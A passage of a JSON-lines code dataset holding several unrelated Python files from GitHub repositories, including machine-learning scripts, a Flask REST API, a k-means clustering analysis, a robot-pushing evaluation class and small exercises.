odabrano:\n 0.5 / 0.125 - teško točno pogoditi jer se mijenjaju od seta do seta podataka\n\n # poly4: stabilniji rezultati\n 0.25/3e-6\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n# Funkcija koja ispisuje tablicu s koeficijentima korelacije (vaćnost svake kategorije za predviđanje)\ndef SVC_coeffs():\n\n X_train = divided_train_data[\"X_train_data\"][\"X\"]\n Y_train = divided_train_data[\"Y_train_data\"][\"X\"]\n X_valid = divided_train_data[\"X_valid_data\"][\"X\"]\n Y_valid = divided_train_data[\"Y_valid_data\"][\"X\"]\n\n # svcModel = SVC(C=0.5, kernel=\"rbf\", gamma=0.125)\n svcModel = SVC(C=33, kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n # acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n # prediction = svcModel.predict(X_valid)\n # acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n\n\n coeff_df = pd.DataFrame(X_train.columns)\n coeff_df.columns = ['Feature']\n coeff_df[\"Correlation\"] = pd.Series(svcModel.coef_[0])\n coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n coeff_df = coeff_df.reset_index(drop=True)\n\n print(coeff_df)\n\n return coeff_df\n\n\nSVC_coeffs()\n\n\n # coeff_df = pd.DataFrame(train_X.columns)\n # coeff_df.columns = ['Feature']\n # coeff_df[\"Correlation\"] = pd.Series(svc.coef_[0])\n # coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n # coeff_df = coeff_df.reset_index(drop=True)","repo_name":"jzivic/Titanic_project","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70784761288","text":"import logging\nfrom dataclasses import dataclass\n\nimport pandas as pd\nfrom lit_ds_utils.decorate.logging import log_function\nfrom sklearn.model_selection import train_test_split\n\nfrom .. import settings\nfrom ..config.constants import (\n DATABRICKS_EXPERIMENT_NAME,\n DATABRICKS_GROUP_NAME,\n DATABRICKS_REGISTERED_MODEL_NAME,\n MODEL_ARTIFACT,\n)\nfrom ..utils.utils import save_local_artifact\nfrom .build import build_model\nfrom .log_model import wrap_and_log_model\n\nlogger = logging.getLogger(__name__)\n\nEXPERIMENT_NAME = settings.str(DATABRICKS_EXPERIMENT_NAME)\nMODEL_NAME = settings.str(DATABRICKS_REGISTERED_MODEL_NAME)\nGROUP_NAME = settings.str(DATABRICKS_GROUP_NAME)\n\n\n@dataclass()\nclass TrainTestSplits:\n \"\"\"Train, test and holdout splits.\"\"\"\n\n train_df: pd.DataFrame\n test_df: pd.DataFrame\n\n\n@log_function()\ndef train_and_log_model(train_df: pd.DataFrame, test_df: pd.DataFrame) -> None:\n \"\"\"Run an ML Flow experiment and log to databricks using the args sent in.\n\n Args:\n train_df: Train df\n test_df: Test df.\n \"\"\"\n logger.info(\"Building model\")\n model = build_model(train_df=train_df)\n save_local_artifact(MODEL_ARTIFACT, model)\n\n logger.info(\"Logging model to MLFlow\")\n wrap_and_log_model(model, test_df=test_df)\n\n\n@log_function()\ndef get_train_test_splits(input_df: pd.DataFrame) -> TrainTestSplits:\n \"\"\"Split the supplied data into training, test and holdout splits.\n\n Args:\n input_df: The dataframe to split.\n\n Returns:\n The train, test and holdout splits.\n \"\"\"\n\n train_df = input_df[input_df['policy_year'] < 2017]\n test_df = input_df[input_df['policy_year'] == 2017]\n\n return TrainTestSplits(train_df, test_df)\n","repo_name":"judemd/ml-playground","sub_path":"ml-template-main/pipeline/model/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36780865148","text":"import re, bs4, string\nfrom project.server.main.parsers.strings import get_clean_text\n\ndef parse_fallback_tags(soup, doi):\n\n res = {'doi': doi}\n affiliations = []\n affiliation_regex = re.compile(\"affili|institution\")\n potential_elts = []\n potential_elts += soup.find_all(id= affiliation_regex) \n potential_elts += soup.find_all(class_= affiliation_regex)\n\n potential_aff = []\n\n for p in potential_elts:\n current_name = get_clean_text(p)\n potential_aff.append(current_name)\n\n #for e in soup.find_all(\"sup\"):\n # if len(get_clean_text(e)) == 1:\n # potential_aff.append(get_clean_text(e.next.next))\n\n for current_name in potential_aff:\n for k in [\"Affiliation\", \"Author Information\"]:\n current_name = current_name.replace(k, \"\").strip()\n if current_name.startswith(';'):\n continue\n if len(current_name.split(' ')) < 2:\n continue\n if len(current_name) > 2:\n current_aff = {'name': current_name}\n if current_aff not in affiliations:\n affiliations.append(current_aff)\n if affiliations:\n res['affiliations'] = affiliations\n\n return res\n","repo_name":"dataesr/bso-parser-html","sub_path":"project/server/main/parsers/fallback_tags.py","file_name":"fallback_tags.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11899500140","text":"from flask import Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom app.db import db\n\nfrom app.countries.models import Country\nfrom .models import University\n\n\nbp = Blueprint('universities', __name__, url_prefix='/universities')\n\n\nclass UniversityBaseView(MethodView):\n def is_column_unique(self, column, value): \n \"\"\"\n Example:\n 'world_rank', 98, \n 'name', 'Some university'\n \"\"\"\n return University.query.filter_by(**{column: value}).first() is None\n\n def is_name_unique(self, name):\n return University.query.filter_by(name=name).first() is None\n\n def get_country(self, country_id):\n return Country.query.filter_by(id=country_id).first()\n\n def validate_data(self, data):\n fields = {\n 'name': str,\n 'world_rank': int,\n 'score': float,\n 'country_id': int,\n }\n\n errors = {}\n for field, _type in fields.items():\n try:\n data[field] = _type(data[field])\n except (KeyError, TypeError, ValueError):\n errors[field] = 'invalid'\n \n return data, errors\n\n\nclass UniversityListCreateView(UniversityBaseView):\n def get(self):\n limit = 20\n\n rows = University.query.limit(limit)\n\n page = request.args.get('page', '1')\n if page and page.isnumeric():\n page = int(page)\n rows = rows.offset((page - 1) * limit)\n\n response = [{'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id} for row in rows]\n\n return jsonify(response)\n\n def post(self):\n data = request.json\n\n data, errors = self.validate_data(request.json)\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n if not self.is_column_unique('name', data['name']):\n errors['name'] = 'unique'\n \n if not self.is_column_unique('world_rank', data['world_rank']):\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n u = University(\n name=data['name'], \n world_rank=data['world_rank'], \n score=data['score'],\n country_id=data['country_id'],\n )\n db.session.add(u)\n db.session.commit()\n db.session.refresh(u)\n\n return jsonify({'id': u.id}), 201 # created\n\n\nclass UniversityDetailUpdateDeleteView(UniversityBaseView):\n def get_object_by_id(self, university_id):\n return University.query.filter_by(id=university_id).first()\n\n def get(self, university_id):\n row = self.get_object_by_id(university_id)\n if row is None:\n return jsonify({'error': 'not_found'}), 404\n\n return jsonify({'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id})\n\n def put(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n \n data, errors = self.validate_data(request.json)\n \n if len(errors):\n return jsonify({'error': errors}), 400\n\n if University.query.filter(University.id != university_id).filter_by(name=data['name']).first():\n errors['name'] = 'unique'\n\n if University.query.filter(University.id != university_id).filter_by(world_rank=data['world_rank']).first():\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n university.name=data['name']\n university.world_rank=data['world_rank']\n university.score=data['score']\n university.country_id=data['country_id']\n \n db.session.commit()\n\n return jsonify({'id': university.id}), 200 # created\n\n def delete(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n\n db.session.delete(university)\n db.session.commit()\n\n return jsonify({'deleted': 'ok'})\n\n\nbp.add_url_rule('/', view_func=UniversityListCreateView.as_view('universities'))\nbp.add_url_rule('/<university_id>/', view_func=UniversityDetailUpdateDeleteView.as_view('university'))\n","repo_name":"Argam431/RESTFULL-Api","sub_path":"app/universities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70330457928","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.spatial.distance import cdist, pdist\nfrom sklearn.cluster import KMeans\n\n# CHARACTER_DATA_FILE = './spambase.data'\n# char_data = pd.read_csv(CHARACTER_DATA_FILE)\n# char_x = char_data[[x for x in char_data.columns if x != \"spam\"]]\n\nraw_data = pd.read_csv('spambase.data', sep = ',', header=None) # 4601 instances\nchar_x = raw_data.drop([57], axis=1)\n# labels = raw_data[[57]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 3680 + 921 instances\n\n# WINE_DATA_FILE = './satellite.data'\n# wine_data = pd.read_csv(WINE_DATA_FILE)\n# wine_x = wine_data[[x for x in wine_data.columns if x != \"quality\"]]\nraw_data = pd.read_csv('satellite.data', sep = ' ', header=None) # 6435 instances\nwine_x = raw_data.drop([36], axis=1)\n# labels = raw_data[[36]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 5148 + 1287 instances\n\n\n\n\n\n\n\n# Train kmean models, once for each value of k (aka create k clusters ea time)\nK = range(1, 40)\nKM_c = [KMeans(n_clusters=k).fit(char_x) for k in K]\nKM_w = [KMeans(n_clusters=k).fit(wine_x) for k in K]\nprint(\"Trained kmean models\")\n\n# For ea val of k, find centroids of ea of their clusters\ncentroids_c = [km.cluster_centers_ for km in KM_c]\ncentroids_w = [km.cluster_centers_ for km in KM_w]\nprint(\"Found the centroids\")\n\n# Calc euclid dist from data pt to center of cluster it belongs to\nDk_c = [cdist(char_x, center, 'euclidean') for center in centroids_c]\nDk_w = [cdist(wine_x, center, 'euclidean') for center in centroids_w]\nprint(\"Calculated euclidean distance\")\n\ncIdx_c = [np.argmin(D, axis=1) for D in Dk_c]\ndist_c = [np.min(D, axis=1) for D in Dk_c]\navgWithinSS_c = [sum(d) / char_x.shape[0] for d in dist_c]\n\n# Total with-in sum of square\nwcss_c = [sum(d**2) for d in dist_c]\ntss_c = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_c = tss_c - wcss_c\ncIdx_w = [np.argmin(D, axis=1) for D in Dk_w]\ndist_w = [np.min(D, axis=1) for D in Dk_w]\navgWithinSS_w = [sum(d) / char_x.shape[0] for d in dist_w]\n\n# Total with-in sum of square\nwcss_w = [sum(d**2) for d in dist_w]\ntss_w = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_w = tss_w - wcss_w\nprint(\"Calculated sum of square errors\")\nkIdx_c = 9\nkIdx_w = 4\nplt.style.use('ggplot')\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_c, '*-', label='Spambase')\nax.plot(K[kIdx_c], avgWithinSS_c[kIdx_c], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='r', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow1.png')\nplt.show()\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_w, '*-', label='Satellite')\nax.plot(K[kIdx_w], avgWithinSS_w[kIdx_w], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='b', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow2.png')\nplt.show()\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_c / tss_c * 100, '*-', label='Spambase')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow3.png')\nplt.show()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_w / tss_w * 100, '*-', label='Satellite')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow4.png')\nplt.show()","repo_name":"jpan68/ML-datasets","sub_path":"HW3 - Unsupervised Learning & Dimensionality Reduction/clustering_kmeans.py","file_name":"clustering_kmeans.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71227335048","text":"from django.urls import path\nfrom blogapp import views # импортируем вьюшки\n\n\napp_name = 'blogapp'\n\nurlpatterns = [\n path('', views.main_view, name='index'),\n path('create/', views.create_post, name='create'),\n path('post/<int:id>/', views.post, name='post')\n]\n","repo_name":"DmitriChe/django-blog20_orm","sub_path":"blog/blogapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2598405509","text":"\"\"\"\nTest for file IO\n\"\"\"\nimport os\n\nfrom bioptim import PhaseDynamics\nimport numpy as np\nimport pytest\n\n\n@pytest.mark.parametrize(\"phase_dynamics\", [PhaseDynamics.SHARED_DURING_THE_PHASE, PhaseDynamics.ONE_PER_NODE])\ndef test_double_pendulum_torque_driven_IOCP(phase_dynamics):\n # Load double pendulum ocp\n from bioptim.examples.inverse_optimal_control import double_pendulum_torque_driven_IOCP as ocp_module\n\n bioptim_folder = os.path.dirname(ocp_module.__file__)\n biorbd_model_path = bioptim_folder + \"/models/double_pendulum.bioMod\"\n\n ocp = ocp_module.prepare_ocp(\n weights=[0.4, 0.3, 0.3],\n coefficients=[1, 1, 1],\n biorbd_model_path=biorbd_model_path,\n phase_dynamics=phase_dynamics,\n n_threads=4 if phase_dynamics == PhaseDynamics.SHARED_DURING_THE_PHASE else 1,\n expand_dynamics=True,\n )\n\n sol = ocp.solve()\n\n # Check constraints\n g = np.array(sol.constraints)\n\n # Check some of the results\n states, controls = sol.states, sol.controls\n q, qdot, tau = states[\"q\"], states[\"qdot\"], controls[\"tau\"]\n\n np.testing.assert_equal(g.shape, (120, 1))\n np.testing.assert_almost_equal(g, np.zeros((120, 1)))\n\n # Check objective function value\n f = np.array(sol.cost)\n np.testing.assert_equal(f.shape, (1, 1))\n np.testing.assert_almost_equal(f[0, 0], 13.03787939)\n\n # initial and final position\n np.testing.assert_almost_equal(q[:, 0], np.array([-3.14159265, 0.0]))\n np.testing.assert_almost_equal(q[:, -1], np.array([3.14159265, 0.0]))\n\n # initial and final velocities\n np.testing.assert_almost_equal(qdot[:, 0], np.array([-3.32315017, 15.70796327]))\n np.testing.assert_almost_equal(qdot[:, -1], np.array([3.0362723, -2.87576071]))\n\n # initial and final controls\n np.testing.assert_almost_equal(tau[:, 0], np.array([-11.49023683]))\n np.testing.assert_almost_equal(tau[:, -2], np.array([0.04617407]))\n","repo_name":"pyomeca/bioptim","sub_path":"tests/shard2/test_global_inverse_optimal_control.py","file_name":"test_global_inverse_optimal_control.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"16"} +{"seq_id":"34762652298","text":"# Dependencies\r\nimport csv \r\n#csv read\r\nwith open ('budget_data.csv') as csvfile: \r\n\r\n csvreader=csv.reader(csvfile, delimiter=',') \r\n header=next(csvreader) \r\n\r\n #Variables and Conditions\r\n months=[] \r\n prolosses=[] \r\n\r\n \r\n total=0\r\n a_change=0\r\n m_change=0\r\n m_count=0\r\n delta1=0\r\n delta2=0\r\n delta_line1=0\r\n delta_line2=0\r\n loop1=0\r\n loop2=0\r\n\r\n #Read\r\n for row in csvreader:\r\n month=row[0] \r\n proloss=row[1] \r\n months.append(month) \r\n prolosses.append(proloss) \r\n \r\n m_count = len(months) \r\n\r\n\r\n#analysis\r\n\r\n#loop1\r\nfor loop1 in range (m_count):\r\n total=total+int(prolosses[loop1]) \r\n\r\n#loop2 (calculation)\r\nfor loop2 in range (m_count-1): #Restrict loop to avoid overflow (last line +1)\r\n a_change=a_change+(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n\r\n m_change=(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n if m_change>delta1: \r\n delta1=m_change\r\n delta_line1=loop2\r\n else:\r\n delta1=delta1\r\n\r\n if m_change<delta2: \r\n delta2=m_change\r\n delta_line2=loop2\r\n else:\r\n delta2=delta2\r\n\r\n#output\r\n\r\nanalysis=f'\\\r\nFinancial Analysis\\n\\\r\n----------------------------\\n\\\r\nTotal Months: {m_count}\\n\\\r\nTotal Amount: ${total}\\n\\\r\nAverage Change: ${round(a_change/(m_count-1),2)}\\n\\\r\nGreatest Increase in Profits: {months[delta_line1+1]} (${int(delta1)})\\n\\\r\nGreatest Decrease in Profits: {months[delta_line2+1]} (${int(delta2)})\\n'\r\n\r\nprint(analysis) \r\n\r\n#txt file\r\n\r\nfile1=open(\"pybank.txt\",\"w\") \r\nfile1.writelines(analysis) \r\nfile1.close() ","repo_name":"Tmoht1015/Module3","sub_path":"Bank/Pybank.py","file_name":"Pybank.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36516688320","text":"# search ab element in 2d sorted array\n# the array is sorted in its each row and in each column\n\ndef search(array, key):\n\n i = 0\n j = len(array[i])-1\n\n while i < len(array) and j < len(array[i]):\n current = array[i][j]\n if current == key:\n return [i, j]\n elif current > key:\n j -= 1\n else:\n i += 1\n return -1\n\n\narray = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 52]\n]\n\nprint(search(array, 52))","repo_name":"pulkitmunjral/DSA_python","sub_path":"Other/searchin2dSortedarray.py","file_name":"searchin2dSortedarray.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40959661603","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport random\nimport glob\nimport sys, os\nimport math\nimport pybullet_data\nimport scipy.misc\nfrom skimage.draw import line, polygon\nfrom custom_utils import load_model, TURTLEBOT_URDF, joints_from_names, \\\n set_joint_positions, HideOutput, get_bodies, sample_placement, pairwise_collision, \\\n set_point, Point, create_box, stable_z, TAN, GREY, connect, PI, OrderedSet, \\\n wait_if_gui, dump_body, set_all_color, BLUE, child_link_from_joint, link_from_name, draw_pose, Pose, pose_from_pose2d, \\\n get_random_seed, get_numpy_seed, set_random_seed, set_numpy_seed, plan_joint_motion, plan_nonholonomic_motion, \\\n joint_from_name, safe_zip, draw_base_limits, BodySaver, WorldSaver, LockRenderer, elapsed_time, disconnect, flatten, \\\n INF, wait_for_duration, get_unbuffered_aabb, draw_aabb, DEFAULT_AABB_BUFFER, get_link_pose, get_joint_positions, \\\n get_subtree_aabb, get_pairs, get_distance_fn, get_aabb, set_all_static, step_simulation, get_bodies_in_region, \\\n AABB, update_scene, Profiler, pairwise_link_collision, BASE_LINK, get_collision_data, draw_pose2d, \\\n normalize_interval, wrap_angle, CIRCULAR_LIMITS, wrap_interval, Euler, rescale_interval, adjust_path, WHITE, RED, \\\n sample_pos_in_env, remove_body, get_euler, get_point, get_config, reset_sim, set_pose, get_quat,euler_from_quat, \\\n quat_from_euler, pixel_from_point, create_cylinder, create_capsule, create_sphere\nclass Eval:\n def __init__(self, sim, utils):\n self.sim = sim\n self.utils = utils\n self.success_list = []\n self.reward_list = []\n self.run_length_list = []\n self.path_length_list = []\n self.current_path_length = 0\n self.current_path = []\n self.current_initial_image = None\n self.global_count = 0\n\n def evaluation_reset(self):\n which_obstacle = self.sim.evaluation_sample[\"obstacle_scenario_id\"]\n self.utils.choose_obstacle_build(which_obstacle)\n self.utils.reset_obj_fix(self.sim.pushing_object_id, self.sim.evaluation_sample[\"start\"])\n self.sim.step_simulation(self.sim.per_step_iterations)\n self.sim.current_obj_conf = get_config(self.sim.pushing_object_id, self.sim._p, self.sim.client_id)\n self.sim.last_obj_conf = self.sim.current_obj_conf\n self.sim.goal_obj_conf = self.sim.evaluation_sample['goal']\n arm_pose = self.sim.evaluation_sample['gripper']\n _, self.sim.current_depth_img, self.sim.current_true_depth = self.utils.get_image()\n self.sim.initial_true_depth = self.sim.current_true_depth\n self.sim.initial_image_processed = self.utils.process_initial_image(self.sim.current_depth_img, self.sim.current_obj_conf)\n target_joint_states = self.sim.get_ik_joints(arm_pose[0], euler_from_quat(arm_pose[1]),\n self.sim._robot_tool_center)[:6]\n self.sim._reset_arm_fixed(target_joint_states)\n\n def write_evaluation_RL(self, Done, reward):\n if Done:\n if self.sim.target_reached:\n self.success_list.append(True)\n else: self.success_list.append(False)\n self.reward_list.append(reward)\n self.run_length_list.append(self.sim.current_steps)\n self.sim.contact_frames.append(self.sim.has_contact)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n def straight_pushing_eval_RL(self, Done, current_pose, last_pose, img):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n self.straight_pushing_picture_RL(img)\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def straight_pushing_picture_RL(self, img):\n img = self.sim.initial_path_img.copy()\n black_pixels_mask = np.all(img == [0, 0, 0], axis=-1)\n img[black_pixels_mask] = [255, 255, 255]\n for p in self.current_path:\n p_1 = self.utils.get_pos_in_image(p[0])\n p_2 = self.utils.get_pos_in_image(p[1])\n img = cv2.line(img, (p_1[0], p_1[1]), (p_2[0], p_2[1]), [255,0,0], 2)\n cv2.imwrite(self.evaluation_save_path + \"path_img_\" + str(self.global_count) + \".png\", img)\n\n def write_evaluation_baseline(self, reached):\n if reached: self.success_list.append(True)\n else: self.success_list.append(False)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.current_path_length), self.sim.evaluation_save_path + \"real_path_length_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n\n def straight_pushing_eval_baseline(self, Done, current_pose, last_pose):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n # self.astar_deviation()\n self.straight_pushing_picture_baseline()\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def astar_deviation(self, plot=False):\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1)\n\n #cut astar path when target is in reach\n goal = np.flip(self.temp(self.sim.goal_obj_conf[0]))\n distances = np.sqrt(np.square(goal[0] - self.sim.baseline.path[:, 0]) + np.square(goal[1] - self.sim.baseline.path[:, 1]))\n till = np.min(np.argwhere(distances < self.sim.baseline.target_reached_thres*256))\n path = self.sim.baseline.path[0:max(till, 1)]\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n self.path_deviation = num_fill/(np.power(2., 16.)*np.power(10., -4.)) #in square centimeters\n print(\"number of cells: \", num_fill)\n print(\"space: {} cm^2\".format(self.path_deviation))\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def theta_star_deviation(self, plot=False):\n path = self.sim.initial_shortest_path\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1) #???\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n print(\"number of cells: \", num_fill)\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def temp(self,coords):\n pos = np.asarray([0, 0], dtype=int)\n # pos[1] = int((coords[0] + 0.5) * 256 / 1) # int((coords[0] + 0.45)*255/0.9) #\n # pos[0] = int((coords[1] + 0.9) * 256 / 1) # int((coords[1] + 0.75)*127/0.45)#\n # pos[0] = int((coords[0] + 0.5)*(self.workspace_size[0] - 1)/1) #int((coords[0] + 0.45)*255/0.9) #\n pos[0] = int((coords[0] + 0.907/2)*(256 - 1)/0.907) #int((coords[0] + 0.45)*255/0.9) #\n # pos[1] = int((coords[1] + 0.9)*(self.workspace_size[1] - 1)/1) #int((coords[1] + 0.75)*127/0.45)#\n pos[1] = int((coords[1] + 0.903)*(256 - 1)/0.903) #int((coords[1] + 0.75)*127/0.45)#\n return pos\n\n def rev_temp(self, coords):\n pos = np.asarray([0,0], dtype=float)\n # pos[0] = (1/2)*(1.2/256) + coords[0]/256*1 - 0.5\n # pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.9\n # pos[0] = (1/2)*(1.2/self.workspace_size[0]) + coords[0]/self.workspace_size[0]*1 - 0.5\n pos[0] = (1/2)*(1/256) + coords[0]/256*1 - 0.907/2\n # pos[1] = (1/2)*(1/self.workspace_size[1]) + coords[1]/self.workspace_size[1]*1 - 0.9\n pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.903\n return pos\n\n def straight_pushing_picture_baseline(self):\n img = self.sim.baseline.initial_path_img.copy()\n for p in self.current_path:\n p_1 = self.temp(p[0])#self.utils.get_pos_in_image(np.append(p[0], [0.025]))\n p_2 = self.temp(p[1])#self.utils.get_pos_in_image(np.append(p[1], [0.025]))\n img = cv2.line(img, (p_2[0], p_2[1]), (p_1[0], p_1[1]), [255,0,255], 2)\n cv2.imwrite(self.sim.evaluation_save_path + \"path_img_\"+ str(self.global_count) + \".png\", img)\n\n","repo_name":"btabia/residual-pushing","sub_path":"push_gym/push_gym/evaluation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36213041028","text":"import time\r\n\r\nnome = None\r\n\r\ndef bemVindo():\r\n global nome\r\n nome = input('Insira seu nome: ')\r\n\r\n confirm = input('Isso está correto? \"{}\" S/N >'.format(nome)).lower()\r\n\r\n if confirm == 's':\r\n nome = nome\r\n else:\r\n bemVindo()\r\n\r\nbemVindo()\r\n\r\ntime.sleep(1)\r\nprint('Bem vindo, ',nome)\r\n\r\n\r\n\r\n\r\n","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"74952360328","text":"import sys\n\n# read file\ndata = sys.stdin.readlines()\n\n# clean\nclean_data = [[int(i.strip()) for i in line.strip()] for line in data]\n\ndata = clean_data\n\n# process\ngamma, epsilon = [], []\nones, zeros = 0, 0\n\nfor i in range(len(data[0])):\n for j in data:\n if j[i] == 0:\n zeros += 1\n else:\n ones += 1\n\n if zeros > ones:\n gamma.append(\"0\")\n epsilon.append(\"1\")\n\n else:\n gamma.append(\"1\")\n epsilon.append(\"0\")\n\n zeros, ones = 0, 0\n\n\ngamma = int(\"\".join(gamma), base=2)\nepsilon = 